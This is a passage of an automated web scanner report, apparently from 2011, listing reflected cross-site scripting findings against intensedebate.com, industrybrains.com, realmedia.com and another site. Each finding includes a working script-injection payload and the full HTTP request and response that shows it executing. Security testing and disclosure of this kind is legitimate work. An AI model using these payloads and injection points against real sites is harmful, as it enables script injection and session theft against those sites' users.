Host:   http://intensedebate.com
Path:   /fb-connect/fbConnect.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2cc27'><script>alert(1)</script>605cb6e27a0 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/fbConnect.php2cc27'><script>alert(1)</script>605cb6e27a0 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4805

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.php2cc27'><script>alert(1)</script>605cb6e27a0'>
...[SNIP]...

1.28. http://intensedebate.com/fb-connect/fbConnect.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/fbConnect.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3738a'><script>alert(1)</script>b1874870dbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/fbConnect.php/3738a'><script>alert(1)</script>b1874870dbc HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4806

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.php/3738a'><script>alert(1)</script>b1874870dbc'>
...[SNIP]...

1.29. http://intensedebate.com/fb-connect/getFB.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/getFB.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload df44a'><script>alert(1)</script>671aa9063a9 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/getFB.phpdf44a'><script>alert(1)</script>671aa9063a9 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4805

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.phpdf44a'><script>alert(1)</script>671aa9063a9'>
...[SNIP]...

1.30. http://intensedebate.com/fb-connect/getFB.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/getFB.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d112'><script>alert(1)</script>1432c2f74b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/getFB.php/3d112'><script>alert(1)</script>1432c2f74b9 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4802

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.php/3d112'><script>alert(1)</script>1432c2f74b9'>
...[SNIP]...

1.31. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81127'><script>alert(1)</script>04c9e41e5e9 was submitted in REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.php81127'><script>alert(1)</script>04c9e41e5e9?token=JyC7TUrDqHsAt8x9KTtYkQqi0Pk09rxT&blogpostid=73522711&time=1296491549666 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4791

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php81127'><script>alert(1)</script>04c9e41e5e9?token=JyC7TUrDqHsAt8x9KTtYkQqi0Pk09rxT&blogpostid=73522711&time=1296491549666'>
...[SNIP]...

1.32. http://intensedebate.com/idc/js/comment-func.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6bf69'><script>alert(1)</script>a0620b0aaaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.php/6bf69'><script>alert(1)</script>a0620b0aaaa HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4810

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php/6bf69'><script>alert(1)</script>a0620b0aaaa'>
...[SNIP]...

1.33. http://intensedebate.com/js/genericCommentWrapper2.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a24a3'><script>alert(1)</script>8d493091df was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/genericCommentWrapper2.phpa24a3'><script>alert(1)</script>8d493091df?acct=dd5b14065e2bc9e2bfced67832069618&postid=195310&title=Microsoft%20warns%20of%20Internet%20Explorer%20XSS%20flaw%20in%20all%20versions%20of%20Windows%20-%20SC%20Magazine%20UK&url=http%3A%2F%2Fwww.scmagazineuk.com%2Fmicrosoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows%2Farticle%2F195310%2F HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5030

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.phpa24a3'><script>alert(1)</script>8d493091df?acct=dd5b14065e2bc9e2bfced67832069618&postid=195310&title=Microsoft%20warns%20of%20Internet%20Explorer%20XSS%20flaw%20in%20all%20versions%20of%20Windows%20-%20SC%20Magazine%20UK&url=http%3A%2F%2Fwww.s
...[SNIP]...

1.34. http://intensedebate.com/js/genericCommentWrapper2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b0f4'><script>alert(1)</script>82f6491ebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/genericCommentWrapper2.php/1b0f4'><script>alert(1)</script>82f6491ebe HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4814

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.php/1b0f4'><script>alert(1)</script>82f6491ebe'>
...[SNIP]...

1.35. http://intensedebate.com/js/getUserMenu.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getUserMenu.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26d34'><script>alert(1)</script>614bd29ba59 was submitted in REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getUserMenu.php26d34'><script>alert(1)</script>614bd29ba59 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4802

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php26d34'><script>alert(1)</script>614bd29ba59'>
...[SNIP]...

1.36. http://intensedebate.com/js/getUserMenu.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getUserMenu.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31bfc'><script>alert(1)</script>3a235cf8e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getUserMenu.php/31bfc'><script>alert(1)</script>3a235cf8e91 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4800

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php/31bfc'><script>alert(1)</script>3a235cf8e91'>
...[SNIP]...

1.37. http://intensedebate.com/logmein [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /logmein

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9a80'><script>alert(1)</script>d035da00fb9 was submitted in REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /logmeind9a80'><script>alert(1)</script>d035da00fb9 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/empty.phpd43c7'%3E%3Cscript%3Ealert(1)%3C/script%3Eb83048b6d9a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __utmb=239309019.1.10.1296494785; __qca=P0-1269071080-1296494784940

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 20:54:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4700

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/logmeind9a80'><script>alert(1)</script>d035da00fb9'>
...[SNIP]...

1.38. http://intensedebate.com/logmein [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /logmein

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1ad4'><script>alert(1)</script>8d1e3f38acf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /logmein?a1ad4'><script>alert(1)</script>8d1e3f38acf=1 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/empty.phpd43c7'%3E%3Cscript%3Ealert(1)%3C/script%3Eb83048b6d9a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __utmb=239309019.1.10.1296494785; __qca=P0-1269071080-1296494784940

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 20:54:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7938

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/logmein?a1ad4'><script>alert(1)</script>8d1e3f38acf=1'>
...[SNIP]...

1.39. http://itknowledgehub.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://itknowledgehub.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db65"><script>alert(1)</script>956356ca0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db65\"><script>alert(1)</script>956356ca0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4db65"><script>alert(1)</script>956356ca0d=1 HTTP/1.1
Host: itknowledgehub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:25:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://itknowledgehub.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 128082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://itknowledgehub.com/?4db65\"><script>alert(1)</script>956356ca0d=1">
...[SNIP]...

1.40. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 381c7<script>alert(1)</script>05017fb37be was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD381c7<script>alert(1)</script>05017fb37be&tr=ECT_NEWS_ARTICLES&num=1&layt=630x90&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:11:25 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:11:25 GMT
Content-Type: application/x-javascript
Content-Length: 95

// Error: Unknown old section ECT_NEWS_TECH_NEWS_WORLD381c7<script>alert(1)</script>05017fb37be

1.41. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e58ef<script>alert(1)</script>33a03b418b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD&tr=ECT_NEWS_ARTICLES&num=1&layt=630x90&fmt=simp&e58ef<script>alert(1)</script>33a03b418b2=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:11:27 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:11:27 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter e58ef<script>alert(1)</script>33a03b418b2

1.42. http://jlinks.industrybrains.com/jsct [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 39215<script>alert(1)</script>040828dfd29 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=890&ct=ECT_NEWS_TECH_NEWS_WORLD&tr=ECT_NEWS_ARTICLES39215<script>alert(1)</script>040828dfd29&num=1&layt=630x90&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:11:26 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:11:26 GMT
Content-Type: application/x-javascript
Content-Length: 92

// Error: Site 890 has no section ECT_NEWS_ARTICLES39215<script>alert(1)</script>040828dfd29

1.43. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b8f"><script>alert(1)</script>8ab429ee252 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews23b8f"><script>alert(1)</script>8ab429ee252/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews23b8f"><script>alert(1)</script>8ab429ee252/runofnetwork/160x600/autnwsrlsttch/ss/a/990304761/x10/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

